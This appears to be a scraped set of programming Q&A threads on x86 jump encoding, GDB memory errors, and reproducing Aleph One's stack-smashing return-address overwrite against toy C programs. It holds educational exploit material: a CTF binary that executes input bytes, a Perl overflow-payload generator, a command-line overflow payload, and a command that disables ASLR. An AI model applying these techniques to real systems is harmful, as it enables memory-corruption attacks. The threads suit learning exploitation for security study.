I wanted to run this assembly jmp 0x8048540 in the C code (below) to run a function located at memory address 0x8048540. But I got seg fault. I decided to see where I went wrong...
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#define AMOUNT_OF_STUFF 10
//TODO: Ask IT why this is here
void win(){
system("/bin/cat ./flag.txt");
}
void vuln(){
char * stuff = (char *)mmap(NULL, AMOUNT_OF_STUFF, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
if(stuff == MAP_FAILED){
printf("Failed to get space. Please talk to admin\n");
exit(0);
}
printf("Give me %d bytes:\n", AMOUNT_OF_STUFF);
fflush(stdout);
int len = read(STDIN_FILENO, stuff, AMOUNT_OF_STUFF);
if(len == 0){
printf("You didn't give me anything :(");
exit(0);
}
void (*func)() = (void (*)())stuff;
func();
}
int main(int argc, char*argv[]){
printf("My mother told me to never accept things from strangers\n");
printf("How bad could running a couple bytes be though?\n");
fflush(stdout);
vuln();
return 0;
}
This is the function at the address:
Dump of assembler code for function win:
0x08048540 <+0>: push %ebp
0x08048541 <+1>: mov %esp,%ebp
0x08048543 <+3>: sub $0x8,%esp
0x08048546 <+6>: sub $0xc,%esp
0x08048549 <+9>: push $0x8048700
0x0804854e <+14>: call 0x80483f0 <system#plt>
0x08048553 <+19>: add $0x10,%esp
0x08048556 <+22>: leave
0x08048557 <+23>: ret
End of assembler dump.
I noticed that the opcode that my assemblers gave me were inconsistent. The jump addresses they gave me were also different from the intended address of 0x8048540.
According to defuse.ca for x86, my string literal is \xE9\x3C\x85\x04\x08. The address I see is 0x804853C
However, according to rasm2 for x86, my string literal is \xe9\x3b\x85\x04\x08. The address I see is 0x804853B
1st Qn: Why are the addresses different from my intended address and so different from each other? They were both supposed to give opcode for x86.
Nevertheless, I just decided to go with rasm2's opcode.
Then, I noticed something weird in GDB. (Note: the read() command reads 10 bytes to the memory address 0xf7fd3000.
(gdb) x/8x 0xf7fd3000
0xf7fd3000: 0xe9 0x3b 0x85 0x04 0x08 0x00 0x00 0x00
Seems all well and good so far. The value in the memory address matches the string literal given by rasm2.
Then I decided to see the memory in terms of instructions:
(gdb) x/2i 0xf7fd3000
0xf7fd3000: jmp 0x1b540
0xf7fd3005: add BYTE PTR [eax],al
Woah. Why jump to address 0x1b540?? Could it just be a visual error?
So I ran it.
But GDB REALLY jumped to that address!
(gdb) si
0x0001b540 in ?? ()
=> 0x0001b540: Cannot access memory at address 0x1b540
I thought perhaps I made a mistake. Perhaps jmp 0x8048540 is illegal. But, according to this source, jmp accepts 32 bit pointers.
2nd Qn: Why is GDB giving me such a ridiculous address?
Could someone kindly enlighten me the reason behind the different addresses? All I want is just to jump to 0x8048540. defuse.ca gave me 0x804853C, rasm2 gave me 0x804853B, and GDB gave me 0x1b540. T.T
Thank you.
FYI, this is from Shells challenge in PicoCTF 2017.
The machine code for "jmp 0x8048540" is the input.
That's wrong:
There are different kinds of jmp instructions (like jmp ecx which takes the destination address from the ecx register) on x86 CPUs.
The jump instructions (jmp, call, je, jae ...) which take an immediate value however are PC-relative:
The destination address of the jump is calculated by the formula:
argument of "jmp" + address of the next instruction
So the following code:
0x12340000 E9 00 00 01 00
Disassembles to:
0x12340000 jmp 0x12350005
This is calculated the following way:
The jmp instruction is 5 bytes long and it is located at address 0x12340000. So the next instruction (the instruction following jmp) is located at 0x12340005.
The argument of jmp is 0x10000 and 0x12340005 + 0x10000 = 0x12350005.
And of course: The instruction will not only disassemble like this but also jump to 0x12350005.
Related
I'm working on a shared mem assignment for uni and I've 'borrowed' and 'massaged' some shellcode I've seen in posts I've read here and other places. I've been able to construct an example that runs on my MacBook (Mojave) and almost does what I want.
However, since I'm not that experienced with assembly programming in an OS environment (MacOS in this case), and because I don't fully understand the assembly below, I need a little help to overcome my last issue.
In my C boilerplate wrapper, I have a loop that calls my shellcode periodically, but the loop only executes one iteration. This leads me to the conclusion that the second syscall (in the code below) is performing an exit 0, thus terminating the process.
How can I modify the assembly to return instead of exit?
Note if asked, I can post more information about the wrapper code and tools I'm using.
bits 64
Section .text
global start
start:
jmp short MESSAGE ;00000000 EB24 jmp short 0x26
GOBACK:
mov eax, 0x2000004 ;00000002 B804000002 mov eax,0x2000004 ; write
mov edi, 0x1 ;00000007 BF01000000 mov edi,0x1
lea rsi, [rel msg] ;0000000C 488D3518000000 lea rsi,[rel 0x2b]
mov edx, 0xf ;00000013 BA0F000000 mov edx,0xf
syscall ;00000018 0F05 syscall
mov eax,0x2000001 ;0000001A B801000002 mov eax,0x2000001 ;exit
mov edi,0x0 ;0000001F BF00000000 mov edi,0x0
syscall ;00000024 0F05 syscall
MESSAGE:
call GOBACK
msg: db "Hello, world!", 0dh, 0ah
.len: equ $ - msg
Here is my C boilerplate code, which includes the shellcode from above.
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
const char shellcode[] = "\xeb\x24\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\x48\x8d\x35\x18\x00\x00\x00\xba\x0f\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xd7\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0d\x0a";
int main(int argc, char **argv)
{
void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
memcpy(mem, shellcode, sizeof(shellcode));
mprotect(mem, sizeof(shellcode), PROT_READ|PROT_WRITE|PROT_EXEC);
for (int i = 0; i < 10; i++) {
int (*func)();
func = (int (*)())mem;
(int)(*func)();
sleep(5);
}
munmap(mem, sizeof(shellcode));
return 0;
}
I have a loop that calls my shellcode
So if it's an actual call then you are good to go and the only change you need to do is to remove the 3 last instructions (mov, mov and syscall) and replaced them with a ret since the return address will be on the stack already. But we need to additionally clean up the stack a little bit since the address of the text string is put there for the sake of syscall, we want to get rid of it before the return.
Also since you shellcode contains an offset (the first jmp opcode with the value of 0x24) it's safer to not delete anything (as it will change the offsets) but to replace with NOP. Unless you modify the shellcode's source code and generate it every time - than it's fine to remove stuff.
So what I would actually propose to do is to replace the bytes that constitutes for the last 3 opcodes with 0x90(NOP) and the last 2 bytes from that replace with pop rax\ret so bytes 0x58 and 0xc3. The final shellcode could look like this:
const char shellcode[] = "\xeb\x24\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\x48\x8d\x35\x18\x00\x00\x00\xba\x0f\x00\x00\x00\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x58\xc3\xe8\xd7\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0d\x0a";
here is my disas code:
0x0804844d <+0>: push %ebp
0x0804844e <+1>: mov %esp,%ebp
0x08048450 <+3>: and $0xfffffff0,%esp
0x08048453 <+6>: sub $0x20,%esp
0x08048456 <+9>: movl $0x8048540,(%esp)
0x0804845d <+16>: call 0x8048310 <puts#plt>
0x08048462 <+21>: lea 0x1c(%esp),%eax
0x08048466 <+25>: mov %eax,0x4(%esp)
0x0804846a <+29>: movl $0x8048555,(%esp)
0x08048471 <+36>: call 0x8048320 <scanf#plt>
0x08048476 <+41>: mov 0x1c(%esp),%eax
0x0804847a <+45>: cmp $0x208c,%eax
0x0804847f <+50>: jne 0x804848f <main+66>
0x08048481 <+52>: movl $0x8048558,(%esp)
0x08048488 <+59>: call 0x8048310 <puts#plt>
0x0804848d <+64>: jmp 0x804849b <main+78>
=> 0x0804848f <+66>: movl $0x8048569,(%esp)
0x08048496 <+73>: call 0x8048310 <puts#plt>
0x0804849b <+78>: mov $0x0,%eax
0x080484a0 <+83>: leave
0x080484a1 <+84>: ret
what i'm tring to examine is $0x208c. When I type x/xw 0x208c it gives me back error which says Cannot access memory at address 0x208c. When i type Info registers and look at eax it says the value which i provided. So basically this program compares two values and depending on that prints something out.The problem is that this is homework from university and I have not got code. Hope you can help. Thank you.
When I type x/xw 0x208c it gives me back error which says Cannot access memory at address 0x208c
The disassembly for your program says that it does something like this:
puts("some string");
int i;
scanf("%d", &i); // I don't know what the actual format string is.
// You can find out with x/s 0x8048555
if (i == 0x208c) { ... } else { ... }
In other words, the 0x208c is a value (8332) that your program has hard-coded in it, and is not a pointer. Therefore, GDB is entirely correct in telling you that if you interpret 0x208c as a pointer, that pointer does not point to readable memory.
i finally figured out to use print statement instead of x/xw
You appear to not understand the difference between print and examine commands. Consider this example:
int foo = 42;
int *pfoo = &foo;
With above, print pfoo will give you the address of foo, and x pfoo will give you the value stored at that address (i.e. the value of foo).
I found out that it is impossible to examine mmaped memory that does not have PROT_READ flag. This is not the OPs problem, but it was mine, and the error message is the same.
Instead of
mmap(0, size, PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
do
mmap(0, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
and voila, the memory can be examined.
Uninitialized pointers
It is kind of obvious in retrospective, but this is what was causing GDB to show that error message to me. Along:
#include <stdio.h>
int main(void) {
int *p;
printf("*p = %d\n", *p);
}
And then:
gdb -q -nh -ex run ./tmp.out
Reading symbols from ./tmp.out...done.
Starting program: /home/ciro/bak/git/cpp-cheat/gdb/tmp.out
Program received signal SIGSEGV, Segmentation fault.
0x0000555555554656 in main () at tmp.c:5
5 printf("*p = %d\n", *p);
(gdb) print *p
Cannot access memory at address 0x0
But in a complex program of course, and where the address was something random different from zero.
In my case the problem was caused by calling munmap with length bigger than mmap:
#include <errno.h>
#include <sys/mman.h>
#include <stdio.h>
#include <string.h>
int main(){
size_t length_alloc = 10354688;
size_t length_unmap = 5917171456;
void *v = mmap(0, 10354688, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (v == MAP_FAILED) {
printf("mmap of %lu bytes failed with error: %s", 10354688, strerror(errno));
}else{
printf("mmaped %p\n", v);
munmap(v, length_unmap);
}
}
So the unmap unmapped also mappings for stacks of a few threads. Pretty nasty one because it rendered the core dump impossible to use with my current skill level. Especially that in the original problem, the size passed to munmap was somewhat random. And it crashed only sometimes and the end of a very lengthy process.
If GDB says memory address not found that means the symbol is not available in the executable file opened by gdb or through file exefilename. OR you have not compiled the exefile with -g option. What happens when you are a newbie for gdb you may have given the command file argfile instead of run argfile. Pls check.
I experienced same error. I solved my case with increasing swap space with Gparted software.
1- First install Gparted with "sudo apt-get install gparted"
2- Open Gparted and right click on swap then select Resize/Move
(Note: you be able to increase swap size only if you have unallocated memory before or after swap memory)
I am trying to reproduce the stackoverflow results that I read from Aleph One's article "smashing the stack for fun and profit"(can be found here:http://insecure.org/stf/smashstack.html).
Trying to overwrite the return address doesn't seem to work for me.
C code:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
//Trying to overwrite return address
ret = buffer1 + 12;
(*ret) = 0x4005da;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
disassembled main:
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004005b0 <+0>: push %rbp
0x00000000004005b1 <+1>: mov %rsp,%rbp
0x00000000004005b4 <+4>: sub $0x10,%rsp
0x00000000004005b8 <+8>: movl $0x0,-0x4(%rbp)
0x00000000004005bf <+15>: mov $0x3,%edx
0x00000000004005c4 <+20>: mov $0x2,%esi
0x00000000004005c9 <+25>: mov $0x1,%edi
0x00000000004005ce <+30>: callq 0x400564 <function>
0x00000000004005d3 <+35>: movl $0x1,-0x4(%rbp)
0x00000000004005da <+42>: mov -0x4(%rbp),%eax
0x00000000004005dd <+45>: mov %eax,%esi
0x00000000004005df <+47>: mov $0x4006dc,%edi
0x00000000004005e4 <+52>: mov $0x0,%eax
0x00000000004005e9 <+57>: callq 0x400450 <printf#plt>
0x00000000004005ee <+62>: leaveq
0x00000000004005ef <+63>: retq
End of assembler dump.
I have hard coded the return address to skip the x=1; code line, I have used a hard coded value from the disassembler(address : 0x4005da). The intent of this exploit is to print 0, but instead it is printing 1.
I have a very strong feeling that "ret = buffer1 + 12;" is not the address of the return address. If this is the case, how can I determine the return address, is gcc allocating more memory between the return address and the buffer.
Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:
Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:
C code:
void function()
{
char buffer[4];
}
int main()
{
function();
}
Assembly (abridged):
function:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
leave
ret
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
call function
...
There are several tools that you can use to inspect the assembly code. First, of course, is
compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are little to no hints for what code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.
The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.
This function function takes the return address and increments 7 to it. The instruction that
the return address originally pointed to is 7 bytes in length, so adding 7 makes the return address point to the instruction immediately after the assignment.
In the example below, I overwrite the return address to skip the instruction x = 1.
simple C program:
void function()
{
char buffer[4];
/* return address is 8 bytes beyond the start of the buffer */
int *ret = buffer + 8;
/* assignment instruction we want to skip is 7 bytes long */
(*ret) += 7;
}
int main()
{
int x = 0;
function();
x = 1;
printf("%d\n",x);
}
Main function (x = 1 at 80483af is seven bytes long):
8048392: 8d4c2404 lea 0x4(%esp),%ecx
8048396: 83e4f0 and $0xfffffff0,%esp
8048399: ff71fc pushl -0x4(%ecx)
804839c: 55 push %ebp
804839d: 89e5 mov %esp,%ebp
804839f: 51 push %ecx
80483a0: 83ec24 sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8 mov -0x8(%ebp),%eax
80483b9: 89442404 mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff call 80482d8 <printf#plt>
80483c9: 83c424 add $0x24,%esp
80483cc: 59 pop %ecx
80483cd: 5d pop %ebp
We know where the return address is and we have demonstrated that changing it can affect the
code that is run. A buffer overflow can do the same thing by using gets and inputing the right character string so that the return address is overwritten with a new address.
In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.
#include <stdio.h>
#include <stdlib.h>
void uncalled()
{
puts("uh oh!");
exit(1);
}
void function()
{
char buffer[4];
gets(buffer);
}
int main()
{
function();
puts("program secure");
}
To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.) , you need to swap the endianness of the address.
In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.
#!/usr/bin/perl
print "x"x#ARGV[1]; # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . #ARGV[0] , -8); # swap endian of input
print "\n"; # new line to end gets
You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.
I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:
char buffer1[5] = "1111";
char buffer2[10] = "2222";
You can figure this out by printing out the stack. Add code like this:
int* pESP;
__asm mov pESP, esp
The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.
What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set a compiler switches to turn all this stuff off.
As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I remove the buffer2 variable, and change buffer1 to 8 bytes so things are more aligned. We will also compile in 32 bit more do make it easier to read the addresses, and turn debugging on(gcc -m32 -g).
void function(int a, int b, int c) {
char buffer1[8];
char *ret;
so let's print the address of buffer1:
(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40
then let's print a bit past that and see what's on the stack.
(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000 0x00000000 0xfecf25c3 0x00000003
0xbffffa50: 0x00000000 0xbffffb50 0xbffffa88 0x00001f3b
0xbffffa60: 0x00000001 0x00000002 0x00000003 0x00000000
0xbffffa70: 0x00000003 0x00000002 0x00000001 0x00001efc
Do a backtrace to see where the return address should be pointing:
(gdb) bt
#0 function (a=1, b=2, c=3) at foo.c:18
#1 0x00001f3b in main () at foo.c:26
and sure enough, there it is at 0xbffffa5b:
(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf
I just wrote a C Code which is below :
#include<stdio.h>
#include<string.h>
void func(char *str)
{
char buffer[24];
int *ret;
strcpy(buffer,str);
}
int main(int argc,char **argv)
{
int x;
x=0;
func(argv[1]);
x=1;
printf("\nx is 1\n");
printf("\nx is 0\n\n");
}
Can please suggest me as to how to skip the line printf("\nx is 1\n");. Earlier the clue which I got was to modify ret variable which is the return address of the function func.
Can you suggest me as to how to change the return address in the above program so that printf("\nx is 1\n"); is skipped.
I have posted this question because I don't know how to change the return address.
It would be great if you help me out.
Thanks
For what I understand, you want the code to execute the instruction x=1; and then jump over the next printf so it will only print x is 0. There's no way to do that.
However, what could be done is making func() erase it's own return address so the code would jump straight to printf("\nx is 0\n\n");. This means jumping over x=1; too.
This is only possible because you are sending to func() whatever is passed through the cmd-line and copying directly to a fixed size buffer. If the string you are trying to copy is bigger then the allocated buffer, you'll probably end up corrupting the stack, and potentially overwriting the function's return address.
There are great books like this one on the subject, and I recommend you to read them.
Loading your application on gdb and disassembling the main function, you'll see something similar to this:
(gdb) disas main
Dump of assembler code for function main:
0x0804840e <main+0>: lea 0x4(%esp),%ecx
0x08048412 <main+4>: and $0xfffffff0,%esp
0x08048415 <main+7>: pushl -0x4(%ecx)
0x08048418 <main+10>: push %ebp
0x08048419 <main+11>: mov %esp,%ebp
0x0804841b <main+13>: push %ecx
0x0804841c <main+14>: sub $0x24,%esp
0x0804841f <main+17>: movl $0x0,-0x8(%ebp)
0x08048426 <main+24>: mov 0x4(%ecx),%eax
0x08048429 <main+27>: add $0x4,%eax
0x0804842c <main+30>: mov (%eax),%eax
0x0804842e <main+32>: mov %eax,(%esp)
0x08048431 <main+35>: call 0x80483f4 <func> // obvious call to func
0x08048436 <main+40>: movl $0x1,-0x8(%ebp) // x = 1;
0x0804843d <main+47>: movl $0x8048520,(%esp) // pushing "x is 1" to the stack
0x08048444 <main+54>: call 0x804832c <puts#plt> // 1st printf call
0x08048449 <main+59>: movl $0x8048528,(%esp) // pushing "x is 0" to the stack
0x08048450 <main+66>: call 0x804832c <puts#plt> // 2nd printf call
0x08048455 <main+71>: add $0x24,%esp
0x08048458 <main+74>: pop %ecx
0x08048459 <main+75>: pop %ebp
0x0804845a <main+76>: lea -0x4(%ecx),%esp
0x0804845d <main+79>: ret
End of assembler dump.
It's important that you notice that the preparation for the 2nd printf call starts at address 0x08048449. In order to override the original return address of func() and make it jump to 0x08048449, you'll have to write beyond the capacity of char buffer[24];. On this test I used char buffer[6]; for simplicity purposes.
While in gdb, if I execute:
run `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
this will successfully override the buffer and replace the address of return with the address I want it to jump to:
Starting program: /home/karl/workspace/stack/fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
x is 0
Program exited with code 011.
(gdb)
I will not explain every step of the way because others have done it so much better already, but if you want to reproduce this behavior directly from the cmd-line, you could execute the following:
./fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
Keep in mind that the memory addresses that gdb reports to you will probably be different than the ones I got.
Note: for this technique to work you'll have to disable a kernel protection first. But just if the command below reports anything different from 0:
cat /proc/sys/kernel/randomize_va_space
to disable it you'll need superuser access:
echo 0 > /proc/sys/kernel/randomize_va_space
The return address from func is on the Stack, right near its local variables (one of them is buffer). If you want to overwrite the return address, you have to write past the end of the array (possibly to buffer[24...27] but i am probably mistaken - could be buffer[28...31] or even buffer[24...31] if you have a 64-bit system). I suggest using a debugger to find out the exact addresses.
BTW get rid of the ret variable - you accomplish nothing by having it around, and it might confuse your calculations.
Note that this "buffer overrun exploit" is a bit hard to debug because strcpy stops copying stuff when it encounters a zero byte, and the address you want to write to the stack probably contains such a byte. It will be easier to do it like this:
void func(char *str)
{
char buffer[24];
sscanf(str, "%x", &buffer[24]); // replace the 24 by 28, 32 or whatever is right
}
And give the address on the command-line as a hexadecimal string. This makes it a bit more clear what you're trying to do, and easier to debug.
This is not possible - it would be possible, if you know the compiler and how it works, the generated assembler code, the used libraries, the architecture, the cpu, the system environment and the lotto numbers of tomorrow - and if you had this knowledge, you would be clever enough not to ask. The only scenario where it would make sense is when someone tries some kind of attack, and do not expect that someone is willing to help you with it.
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret) += 8;//why is it 8??
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
The above demo is from here:
http://insecure.org/stf/smashstack.html
But it's not working here:
D:\test>gcc -Wall -Wextra hw.cpp && a.exe
hw.cpp: In function `void function(int, int, int)':
hw.cpp:6: warning: unused variable 'buffer2'
hw.cpp: At global scope:
hw.cpp:4: warning: unused parameter 'a'
hw.cpp:4: warning: unused parameter 'b'
hw.cpp:4: warning: unused parameter 'c'
1
And I don't understand why it's 8 though the author thinks:
A little math tells us the distance is
8 bytes.
My gdb dump as called:
Dump of assembler code for function main:
0x004012ee <main+0>: push %ebp
0x004012ef <main+1>: mov %esp,%ebp
0x004012f1 <main+3>: sub $0x18,%esp
0x004012f4 <main+6>: and $0xfffffff0,%esp
0x004012f7 <main+9>: mov $0x0,%eax
0x004012fc <main+14>: add $0xf,%eax
0x004012ff <main+17>: add $0xf,%eax
0x00401302 <main+20>: shr $0x4,%eax
0x00401305 <main+23>: shl $0x4,%eax
0x00401308 <main+26>: mov %eax,0xfffffff8(%ebp)
0x0040130b <main+29>: mov 0xfffffff8(%ebp),%eax
0x0040130e <main+32>: call 0x401b00 <_alloca>
0x00401313 <main+37>: call 0x4017b0 <__main>
0x00401318 <main+42>: movl $0x0,0xfffffffc(%ebp)
0x0040131f <main+49>: movl $0x3,0x8(%esp)
0x00401327 <main+57>: movl $0x2,0x4(%esp)
0x0040132f <main+65>: movl $0x1,(%esp)
0x00401336 <main+72>: call 0x4012d0 <function>
0x0040133b <main+77>: movl $0x1,0xfffffffc(%ebp)
0x00401342 <main+84>: mov 0xfffffffc(%ebp),%eax
0x00401345 <main+87>: mov %eax,0x4(%esp)
0x00401349 <main+91>: movl $0x403000,(%esp)
0x00401350 <main+98>: call 0x401b60 <printf>
0x00401355 <main+103>: leave
0x00401356 <main+104>: ret
0x00401357 <main+105>: nop
0x00401358 <main+106>: add %al,(%eax)
0x0040135a <main+108>: add %al,(%eax)
0x0040135c <main+110>: add %al,(%eax)
0x0040135e <main+112>: add %al,(%eax)
End of assembler dump.
Dump of assembler code for function function:
0x004012d0 <function+0>: push %ebp
0x004012d1 <function+1>: mov %esp,%ebp
0x004012d3 <function+3>: sub $0x38,%esp
0x004012d6 <function+6>: lea 0xffffffe8(%ebp),%eax
0x004012d9 <function+9>: add $0xc,%eax
0x004012dc <function+12>: mov %eax,0xffffffd4(%ebp)
0x004012df <function+15>: mov 0xffffffd4(%ebp),%edx
0x004012e2 <function+18>: mov 0xffffffd4(%ebp),%eax
0x004012e5 <function+21>: movzbl (%eax),%eax
0x004012e8 <function+24>: add $0x5,%al
0x004012ea <function+26>: mov %al,(%edx)
0x004012ec <function+28>: leave
0x004012ed <function+29>: ret
In my case the distance should be - = 5,right?But it seems not working..
Why function needs 56 bytes for local variables?( sub $0x38,%esp )
As joveha pointed out, the value of EIP saved on the stack (return address) by the call instruction needs to be incremented by 7 bytes (0x00401342 - 0x0040133b = 7) in order to skip the x = 1; instruction (movl $0x1,0xfffffffc(%ebp)).
You are correct that 56 bytes are being reserved for local variables (sub $0x38,%esp), so the missing piece is how many bytes past buffer1 on the stack is the saved EIP.
A bit of test code and inline assembly tells me that the magic value is 28 for my test. I cannot provide a definitive answer as to why it is 28, but I would assume the compiler is adding padding and/or stack canaries.
The following code was compiled using GCC 3.4.5 (MinGW) and tested on Windows XP SP3 (x86).
unsigned long get_ebp() {
__asm__("pop %ebp\n\t"
"movl %ebp,%eax\n\t"
"push %ebp\n\t");
}
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
/* distance in bytes from buffer1 to return address on the stack */
printf("test %d\n", ((get_ebp() + 4) - (unsigned long)&buffer1));
ret = (int *)(buffer1 + 28);
(*ret) += 7;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
I could have just as easily used gdb to determine this value.
(compiled w/ -g to include debug symbols)
(gdb) break function
...
(gdb) run
...
(gdb) p $ebp
$1 = (void *) 0x22ff28
(gdb) p &buffer1
$2 = (char (*)[5]) 0x22ff10
(gdb) quit
(0x22ff28 + 4) - 0x22ff10 = 28
(ebp value + size of word) - address of buffer1 = number of bytes
In addition to Smashing The Stack For Fun And Profit, I would suggest reading some of the articles I mentioned in my answer to a previous question of yours and/or other material on the subject. Having a good understanding of exactly how this type of exploit works should help you write more secure code.
It's hard to predict what buffer1 + 12 really points to. Your compiler can put buffer1 and buffer2 in any location on the stack it desires, even going as far as to not save space for buffer2 at all. The only way to really know where buffer1 goes is to look at the assembler output of your compiler, and there's a good chance it would jump around with different optimization settings or different versions of the same compiler.
I do not test the code on my own machine yet, but have you taken memory alignment into consideration?
Try to disassembly the code with gcc. I think a assembly code may give you a further understanding of the code. :-)
This code prints out 1 as well on OpenBSD and FreeBSD, and gives a segmentation fault on Linux.
This kind of exploit is heavily dependent on both the instruction set of the particular machine, and the calling conventions of the compiler and operating system. Everything about the layout of the stack is defined by the implementation, not the C language. The article assumes Linux on x86, but it looks like you're using Windows, and your system could be 64-bit, although you can switch gcc to 32-bit with -m32.
The parameters you'll have to tweak are 12, which is the offset from the tip of the stack to the return address, and 8, which is how many bytes of main you want to jump over. As the article says, you can use gdb to inspect the disassembly of the function to see (a) how far the stack gets pushed when you call function, and (b) the byte offsets of the instructions in main.
The +8 bytes part is by how much he wants the saved EIP to the incremented with. The EIP was saved so the program could return to the last assignment after the function is done - now he wants to skip over it by adding 8 bytes to the saved EIP.
So all he tries to is to "skip" the
x = 1;
In your case the saved EIP will point to 0x0040133b, the first instruction after function returns. To skip the assignment you need to make the saved EIP point to 0x00401342. That's 7 bytes.
It's really a "mess with RET EIP" rather than an buffer overflow example.
And as far as the 56 bytes for local variables goes, that could be anything your compiler comes up with like padding, stack canaries, etc.
Edit:
This shows how difficult it is to make buffer overflows examples in C. The offset of 12 from buffer1 assumes a certain padding style and compile options. GCC will happily insert stack canaries nowadays (which becomes a local variable that "protects" the saved EIP) unless you tell it not to. Also, the new address he wants to jump to (the start instruction for the printf call) really has to be resolved manually from assembly. In his case, on his machie, with his OS, with his compiler, on that day.... it was 8.
You're compiling a C program with the C++ compiler. Rename hw.cpp to hw.c and you'll find it will compile.